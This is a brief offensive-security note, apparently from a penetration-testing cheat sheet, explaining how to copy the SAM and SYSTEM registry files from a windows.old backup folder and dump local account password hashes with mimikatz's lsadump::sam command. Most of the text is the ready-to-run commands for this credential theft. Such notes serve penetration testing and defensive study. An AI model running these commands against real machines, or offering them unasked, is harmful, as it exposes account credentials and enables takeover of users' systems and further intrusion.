Collecting Hashes Using SAM and SYSTEM Files
Collecting Hashes Using SAM and SYSTEM Files
This is case-specific. That is when you have SAM and SYSTEM files in the backup folder. Let's say windows.old
First, we have to copy the file to other directories let's say C:\temp.
copy C:\windows.old\Windows\System32\SAM C:\temp
copy C:\windows.old\Windows\System32\SYSTEM C:\temp
lsNow we can run mimikatz to get all hash values.
.\mimikatz.exe "log" "lsadump::sam /system:C:\temp\SYSTEM /sam:C:\temp\SAM" "exit"Last updated